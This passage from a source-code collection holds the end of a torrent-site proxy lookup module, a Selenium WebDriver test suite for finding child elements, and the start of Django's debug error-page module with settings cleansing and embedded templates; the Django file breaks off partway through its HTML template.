self.logger.debug("Something gone wrong while updating config file.")
self.logger.exception(e)
# To get proxies for KAT/TPB/...
def get_proxies(self, name):
"""
Get Proxies.
Proxies are read from config.ini file.
"""
self.logger.debug("getting proxies for '%s'" % (name))
temp = []
self.config.read(self.config_file)
name = '{}_URL'.format(name.upper())
self.url = self.config.get('Torrench-Config', name)
self.urllist = self.url.split()
if name == 'TPB_URL':
soup = self.http_request(self.urllist[-1])
link = soup.find_all('td', class_='site')
del self.urllist[-1]
for i in link:
temp.append(i.a["href"])
self.urllist.extend(temp)
elif name == "1337X_URL":
soup = self.http_request(self.urllist[-1])
link = soup.findAll('td', class_='text-left')
del self.urllist[-1]
for i in link:
temp.append(i.a["href"])
self.urllist.extend(temp)
self.logger.debug("got %d proxies!" % (len(self.urllist)))
return self.urllist
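# Illustrative usage sketch (assumption: not part of the original module;
# 'tpb' is an example site name, and Config() needs a valid config.ini):
#
#     config = Config()
#     if config.file_exists():
#         proxies = config.get_proxies('tpb')
#     else:
#         config.update_file()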
| gpl-3.0 |
joshuaduffy/selenium | py/test/selenium/webdriver/common/children_finding_tests.py | 3 | 10379 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import InvalidSelectorException
from selenium.webdriver.common.by import By
class ChildrenFindingTests(unittest.TestCase):
def test_should_find_element_by_xpath(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
child = element.find_element_by_xpath("select")
self.assertEqual(child.get_attribute("id"), "2")
def test_should_not_find_element_by_xpath(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element_by_xpath("select/x")
self.fail("Expected NoSuchElementException to have been thrown")
        except NoSuchElementException:
pass
def test_finding_dot_slash_elements_on_element_by_xpath_should_find_not_top_level_elements(self):
self._load_simple_page()
parent = self.driver.find_element_by_id("multiline")
children = parent.find_elements_by_xpath("./p")
self.assertEqual(1, len(children))
self.assertEqual("A div containing", children[0].text)
def test_should_find_elements_by_xpath(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
children = element.find_elements_by_xpath("select/option")
        self.assertEqual(len(children), 8)
self.assertEqual(children[0].text, "One")
self.assertEqual(children[1].text, "Two")
def test_should_not_find_elements_by_xpath(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
children = element.find_elements_by_xpath("select/x")
self.assertEqual(len(children), 0)
def test_finding_elements_on_element_by_xpath_should_find_top_level_elements(self):
self._load_simple_page()
parent = self.driver.find_element_by_id("multiline")
all_para_elements = self.driver.find_elements_by_xpath("//p")
children = parent.find_elements_by_xpath("//p")
self.assertEqual(len(all_para_elements), len(children))
def test_should_find_element_by_name(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
child = element.find_element_by_name("selectomatic")
self.assertEqual(child.get_attribute("id"), "2")
def test_should_find_elements_by_name(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
children = element.find_elements_by_name("selectomatic")
self.assertEqual(len(children), 2)
def test_should_find_element_by_id(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
child = element.find_element_by_id("2")
self.assertEqual(child.get_attribute("name"), "selectomatic")
def test_should_find_elements_by_id(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
child = element.find_elements_by_id("2")
self.assertEqual(len(child), 2)
def test_should_find_element_by_id_when_multiple_matches_exist(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_id("test_id_div")
child = element.find_element_by_id("test_id")
self.assertEqual(child.text, "inside")
def test_should_find_element_by_id_when_no_match_in_context(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_id("test_id_div")
try:
element.find_element_by_id("test_id_out")
self.fail("Expected NoSuchElementException to have been thrown")
        except NoSuchElementException:
pass
def test_should_find_element_by_link_text(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("div1")
child = element.find_element_by_link_text("hello world")
self.assertEqual(child.get_attribute("name"), "link1")
def test_should_find_elements_by_link_text(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("div1")
children = element.find_elements_by_link_text("hello world")
self.assertEqual(len(children), 2)
self.assertEqual("link1", children[0].get_attribute("name"))
self.assertEqual("link2", children[1].get_attribute("name"))
def test_should_find_element_by_class_name(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("classes")
element = parent.find_element_by_class_name("one")
self.assertEqual("Find me", element.text)
def test_should_find_elements_by_class_name(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("classes")
elements = parent.find_elements_by_class_name("one")
self.assertEqual(2, len(elements))
def test_should_find_element_by_tag_name(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("div1")
element = parent.find_element_by_tag_name("a")
self.assertEqual("link1", element.get_attribute("name"))
def test_should_find_elements_by_tag_name(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("div1")
elements = parent.find_elements_by_tag_name("a")
self.assertEqual(2, len(elements))
def test_should_be_able_to_find_an_element_by_css_selector(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("form2")
element = parent.find_element_by_css_selector('*[name="selectomatic"]')
self.assertEqual("2", element.get_attribute("id"))
def test_should_be_able_to_find_multiple_elements_by_css_selector(self):
self._load_page("nestedElements")
parent = self.driver.find_element_by_name("form2")
elements = parent.find_elements_by_css_selector(
'*[name="selectomatic"]')
self.assertEqual(2, len(elements))
def test_should_throw_an_error_if_user_passes_in_integer(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element(By.ID, 333333)
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_tuple(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element((By.ID, 333333))
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_inNone(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element(By.ID, None)
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_invalid_by(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element("css", "body")
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_integer_when_find_elements(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_elements(By.ID, 333333)
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_tuple_when_find_elements(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_elements((By.ID, 333333))
self.fail("_should have thrown _web_driver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_inNone_when_find_elements(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_elements(By.ID, None)
self.fail("should have thrown webdriver Exception")
except InvalidSelectorException:
pass #_this is expected
def test_should_throw_an_error_if_user_passes_in_invalid_by_when_find_elements(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_elements("css", "body")
self.fail("Should have thrown WebDriver Exception")
except InvalidSelectorException:
pass #_this is expected
def _page_url(self, name):
return self.webserver.where_is(name + '.html')
def _load_simple_page(self):
self._load_page("simpleTest")
def _load_page(self, name):
self.driver.get(self._page_url(name))
| apache-2.0 |
tayfun/django | django/views/debug.py | 44 | 46856 | from __future__ import unicode_literals
import re
import sys
import types
from django.conf import settings
from django.core.urlresolvers import Resolver404, resolve
from django.http import HttpResponse, HttpResponseNotFound
from django.template import Context, Engine, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils import lru_cache, six, timezone
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as _
# Minimal Django templates engine to render the error templates
# regardless of the project's TEMPLATES setting.
DEBUG_ENGINE = Engine(debug=True)
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|SIGNATURE')
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
yield 0
p = template_source.find('\n')
while p >= 0:
yield p + 1
p = template_source.find('\n', p + 1)
yield len(template_source) + 1
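# Illustrative sketch (assumption: documentation-only helper, not part of
# Django): linebreak_iter yields the offset of the first character of every
# line, plus a final sentinel one past the end of the source.
def _example_linebreak_iter():
    assert list(linebreak_iter("ab\ncd")) == [0, 3, 6]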
class CallableSettingWrapper(object):
""" Object to wrap callable appearing in settings
* Not to call in the debug page (#21345).
    * Not to break the debug page if the callable forbids setting attributes (#23070).
"""
def __init__(self, callable_setting):
self._wrapped = callable_setting
def __repr__(self):
return repr(self._wrapped)
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = {k: cleanse_setting(k, v) for k, v in value.items()}
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
if callable(cleansed):
# For fixing #21345 and #23070
cleansed = CallableSettingWrapper(cleansed)
return cleansed
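# Illustrative sketch (assumption: documentation-only helper, not part of
# Django): keys matching HIDDEN_SETTINGS are masked, and dict values are
# cleansed recursively key by key.
def _example_cleanse_setting():
    assert cleanse_setting('API_TOKEN', 'abc123') == CLEANSED_SUBSTITUTE
    assert cleanse_setting('DATABASES', {'PASSWORD': 'hunter2'}) == {
        'PASSWORD': CLEANSED_SUBSTITUTE,
    }
    assert cleanse_setting('DEBUG', True) is True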
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb, status_code=500):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponse(text, status=status_code, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponse(html, status=status_code, content_type='text/html')
@lru_cache.lru_cache()
def get_default_exception_reporter_filter():
# Instantiate the default filter for the first time and cache it.
return import_string(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
def get_exception_reporter_filter(request):
default_filter = get_default_exception_reporter_filter()
return getattr(request, 'exception_reporter_filter', default_filter)
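# Illustrative note (assumption: MyReporterFilter is a hypothetical class): a
# view or middleware can override the reporter filter per request, e.g.
#     request.exception_reporter_filter = MyReporterFilter()
# otherwise the cached default built from
# settings.DEFAULT_EXCEPTION_REPORTER_FILTER is used.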
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(tb_frame.f_locals.items())
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_cleansed_multivaluedict(self, request, multivaluedict):
"""
Replaces the keys in a MultiValueDict marked as sensitive with stars.
This mitigates leaking sensitive POST parameters if something like
request.POST['nonexistent_key'] throws an exception (#21098).
"""
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
multivaluedict = multivaluedict.copy()
for param in sensitive_post_parameters:
if param in multivaluedict:
multivaluedict[param] = CLEANSED_SUBSTITUTE
return multivaluedict
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def cleanse_special_types(self, request, value):
try:
# If value is lazy or a complex object of another kind, this check
            # might raise an exception. The isinstance() check still works for
            # lazy objects, so a lazy MultiValueDict is detected here as well.
is_multivalue_dict = isinstance(value, MultiValueDict)
except Exception as e:
return '{!r} while evaluating {!r}'.format(e, value)
if is_multivalue_dict:
# Cleanse MultiValueDicts (request.POST is the one we usually care about)
value = self.get_cleansed_multivaluedict(request, value)
return value
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
else:
value = self.cleanse_special_types(request, value)
cleansed[name] = value
else:
# Potentially cleanse the request and any MultiValueDicts if they
# are one of the frame variables.
for name, value in tb_frame.f_locals.items():
cleansed[name] = self.cleanse_special_types(request, value)
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = getattr(self.exc_value, 'template_debug', None)
self.template_does_not_exist = False
self.postmortem = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def get_traceback_data(self):
"""Return a dictionary containing traceback information."""
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
self.template_does_not_exist = True
self.postmortem = self.exc_value.chain or [self.exc_value]
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame_vars = []
for k, v in frame['vars']:
v = pprint(v)
                    # The force_escape filter assumes unicode; make sure that works
if isinstance(v, six.binary_type):
v = v.decode('utf-8', 'replace') # don't choke on non-utf-8 input
# Trim large blobs of data
if len(v) > 4096:
v = '%s... <trimmed %d bytes string>' % (v[0:4096], len(v))
frame_vars.append((k, force_escape(v)))
frame['vars'] = frame_vars
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = smart_text(
unicode_str[max(start - 5, 0):min(end + 5, len(unicode_str))],
'ascii', errors='replace'
)
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST': self.filter.get_post_parameters(self.request),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': timezone.now(),
'django_version_info': get_version(),
'sys_path': sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'postmortem': self.postmortem,
}
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = smart_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEMPLATE)
c = Context(self.get_traceback_data(), use_l10n=False)
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEXT_TEMPLATE)
c = Context(self.get_traceback_data(), autoescape=False, use_l10n=False)
return t.render(c)
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
try:
source = loader.get_source(module_name)
except ImportError:
pass
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.read().splitlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = source[lower_bound:lineno]
context_line = source[lineno]
post_context = source[lineno + 1:upper_bound]
return lower_bound, pre_context, context_line, post_context
def get_traceback_frames(self):
def explicit_or_implicit_cause(exc_value):
explicit = getattr(exc_value, '__cause__', None)
implicit = getattr(exc_value, '__context__', None)
return explicit or implicit
# Get the exception and all its causes
exceptions = []
exc_value = self.exc_value
while exc_value:
exceptions.append(exc_value)
exc_value = explicit_or_implicit_cause(exc_value)
frames = []
# No exceptions were supplied to ExceptionReporter
if not exceptions:
return frames
# In case there's just one exception (always in Python 2,
# sometimes in Python 3), take the traceback from self.tb (Python 2
# doesn't have a __traceback__ attribute on Exception)
exc_value = exceptions.pop()
tb = self.tb if six.PY2 or not exceptions else exc_value.__traceback__
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(
filename, lineno, 7, loader, module_name,
)
if pre_context_lineno is not None:
frames.append({
'exc_cause': explicit_or_implicit_cause(exc_value),
'exc_cause_explicit': getattr(exc_value, '__cause__', True),
'tb': tb,
'type': 'django' if module_name.startswith('django.') else 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
# If the traceback for current exception is consumed, try the
# other exception.
if six.PY2:
tb = tb.tb_next
elif not tb.tb_next and exceptions:
exc_value = exceptions.pop()
tb = exc_value.__traceback__
else:
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [(f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
error_url = exception.args[0]['path']
except (IndexError, TypeError, KeyError):
error_url = request.path_info[1:] # Trim leading slash
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried # empty URLconf
or (request.path == '/'
and len(tried) == 1 # default URLconf
and len(tried[0]) == 1
and getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin')):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
caller = ''
try:
resolver_match = resolve(request.path)
except Resolver404:
pass
else:
obj = resolver_match.func
if hasattr(obj, '__name__'):
caller = obj.__name__
elif hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'):
caller = obj.__class__.__name__
if hasattr(obj, '__module__'):
module = obj.__module__
caller = '%s.%s' % (module, caller)
t = DEBUG_ENGINE.from_string(TECHNICAL_404_TEMPLATE)
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': error_url,
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
'raising_view_name': caller,
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = DEBUG_ENGINE.from_string(DEFAULT_URLCONF_TEMPLATE)
c = Context({
"title": _("Welcome to Django"),
"heading": _("It worked!"),
"subheading": _("Congratulations on your first Django-powered page."),
"instructions": _("Of course, you haven't actually done any work yet. "
"Next, start your first app by running <code>python manage.py startapp [app_label]</code>."),
"explanation": _("You're seeing this message because you have <code>DEBUG = True</code> in your "
"Django settings file and you haven't configured any URLs. Get to work!"),
})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = ("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; padding: 3px 2px; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 10px 20px; }
#template-not-exist .postmortem-section { margin-bottom: 3px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
.append-bottom { margin-bottom: 10px; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block': 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML.trim() == s1 ? s2: s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}"""
"""{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">"""
"""{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}"""
"""</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if postmortem %}
<p class="append-bottom">Django tried loading these templates, in this order:</p>
{% for entry in postmortem %}
<p class="postmortem-section">Using engine <code>{{ entry.backend.name }}</code>:</p>
<ul>
{% if entry.tried %}
{% for attempt in entry.tried %}
<li><code>{{ attempt.0.loader_name }}</code>: {{ attempt.0.name }} ({{ attempt.1 }})</li>
{% endfor %}
</ul>
{% else %}
<li>This engine did not provide a list of tried templates.</li>
{% endif %}
</ul>
{% endfor %}
{% else %}
<p>No templates were found because your 'TEMPLATES' setting is not configured.</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}
